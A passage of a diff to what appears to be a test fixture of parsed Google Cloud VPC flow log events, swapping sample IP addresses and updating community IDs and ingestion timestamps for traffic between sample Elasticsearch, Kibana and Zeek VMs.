"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392251600Z", + "original": "{\"insertId\":\"19im82tfdygzo6\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41822,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:40.058368408Z\",\"packets_sent\":\"4\",\"reporter\":\"SRC\",\"rtt_msec\":\"1439\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", "end": "2019-06-14T03:40:40.058368408Z", @@ -19384,10 +19384,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33532, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -19401,7 +19401,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Es6n9v5EcaaEvnW+j5pfFK2BgWc=", + "community_id": "1:O9TYQRXp+xFyW519UWDWFeTm/HY=", "bytes": 188997, "name": "default", "transport": "tcp", @@ -19424,7 +19424,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -19460,8 +19460,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869134500Z", - "original": "{\"insertId\":\"19im82tfdygzno\",\"jsonPayload\":{\"bytes_sent\":\"188997\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"251\",\"reporter\":\"SRC\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392257300Z", + "original": "{\"insertId\":\"19im82tfdygzno\",\"jsonPayload\":{\"bytes_sent\":\"188997\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"251\",\"reporter\":\"SRC\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -19482,10 +19482,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33568, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -19499,7 +19499,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0bB9/qzQDttOyEP0YcGU/tYSYIQ=", + "community_id": "1:cHbiBB9WtpuQHZE4rFxmPUo/X2c=", "bytes": 16783, "name": "default", "transport": "tcp", @@ -19522,7 +19522,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -19558,8 +19558,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869137800Z", - "original": "{\"insertId\":\"19im82tfdygzo0\",\"jsonPayload\":{\"bytes_sent\":\"16783\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"79\",\"reporter\":\"SRC\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392262900Z", + "original": "{\"insertId\":\"19im82tfdygzo0\",\"jsonPayload\":{\"bytes_sent\":\"16783\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"79\",\"reporter\":\"SRC\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", "end": "2019-06-14T03:49:51.789035952Z", @@ -19580,10 +19580,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -19597,7 +19597,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:QGl7xqW3Uf/sdc65sGHXAGERKzs=", + "community_id": "1:vA48e3jlLz+8NYBf08b8IMoSjVU=", "bytes": 18120, "name": "default", "transport": "tcp", @@ -19620,7 +19620,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -19656,8 +19656,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869141600Z", - "original": "{\"insertId\":\"19im82tfdygznd\",\"jsonPayload\":{\"bytes_sent\":\"18120\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392266800Z", + "original": "{\"insertId\":\"19im82tfdygznd\",\"jsonPayload\":{\"bytes_sent\":\"18120\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -19678,10 +19678,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -19695,7 +19695,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:A0Ohg3bqUresKEeBgZsLcFqEPRw=", + "community_id": "1:yyzV++A5KAdmyX88TOnGIQ8RV60=", "bytes": 64071, "name": "default", "transport": "tcp", @@ -19718,7 +19718,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -19754,8 +19754,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869148300Z", - "original": "{\"insertId\":\"19im82tfdygzn8\",\"jsonPayload\":{\"bytes_sent\":\"64071\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"368\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392271300Z", + "original": "{\"insertId\":\"19im82tfdygzn8\",\"jsonPayload\":{\"bytes_sent\":\"64071\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"368\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -19776,10 +19776,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53106, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -19793,7 +19793,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7XAVLIIXucPcO5qM8uynmx+KF7s=", + "community_id": "1:/j39rLoEcamlJFwzEQGPMQYhVds=", "bytes": 175465, "name": "default", "transport": "tcp", @@ -19816,7 +19816,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { @@ -19852,8 +19852,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869151500Z", - "original": "{\"insertId\":\"19im82tfdygznw\",\"jsonPayload\":{\"bytes_sent\":\"175465\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":53106,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"337\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392276900Z", + "original": "{\"insertId\":\"19im82tfdygznw\",\"jsonPayload\":{\"bytes_sent\":\"175465\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53106,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"337\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", "end": "2019-06-14T03:49:56.401543207Z", @@ -19876,9 +19876,9 @@ "as": { "number": 16509 }, - "address": "203.0.113.228", + "address": "67.43.156.13", "port": 9243, - "ip": "203.0.113.228" + "ip": "67.43.156.13" }, "source": { "address": "10.49.136.133", @@ -19892,7 +19892,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:arV4D7RJIpRwsrWa/m7Q9mUVaPI=", + "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", "bytes": 1987804, "transport": "tcp", "type": "ipv4", @@ -19907,7 +19907,7 @@ "related": { "ip": [ "10.49.136.133", - "203.0.113.228" + "67.43.156.13" ] }, "gcp": { @@ -19931,8 +19931,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869155200Z", - "original": "{\"insertId\":\"19im82tfdygzo2\",\"jsonPayload\":{\"bytes_sent\":\"1987804\",\"connection\":{\"dest_ip\":\"203.0.113.228\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":52780},\"dest_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"26428\",\"reporter\":\"SRC\",\"rtt_msec\":\"91\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392280900Z", + "original": "{\"insertId\":\"19im82tfdygzo2\",\"jsonPayload\":{\"bytes_sent\":\"1987804\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":52780},\"dest_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"26428\",\"reporter\":\"SRC\",\"rtt_msec\":\"91\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.183499423Z", "end": "2019-06-14T03:49:58.592579489Z", @@ -19959,18 +19959,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 206824, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 242 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:uLseEqRu8Dul5leogDK11gQV06U=", + "community_id": "1:NkGfacExXrlt+hMyCxxaT2CdDeM=", "bytes": 206824, "name": "default", "transport": "tcp", @@ -19992,7 +19992,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -20029,8 +20029,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869158Z", - "original": "{\"insertId\":\"19im82tfdygzn9\",\"jsonPayload\":{\"bytes_sent\":\"206824\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392285Z", + "original": "{\"insertId\":\"19im82tfdygzn9\",\"jsonPayload\":{\"bytes_sent\":\"206824\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -20057,18 +20057,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 14287, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 80 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:QGl7xqW3Uf/sdc65sGHXAGERKzs=", + "community_id": "1:vA48e3jlLz+8NYBf08b8IMoSjVU=", "bytes": 14287, "name": "default", "transport": "tcp", @@ -20090,7 +20090,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, @@ -20127,8 +20127,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869161Z", - "original": "{\"insertId\":\"19im82tfdygznh\",\"jsonPayload\":{\"bytes_sent\":\"14287\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"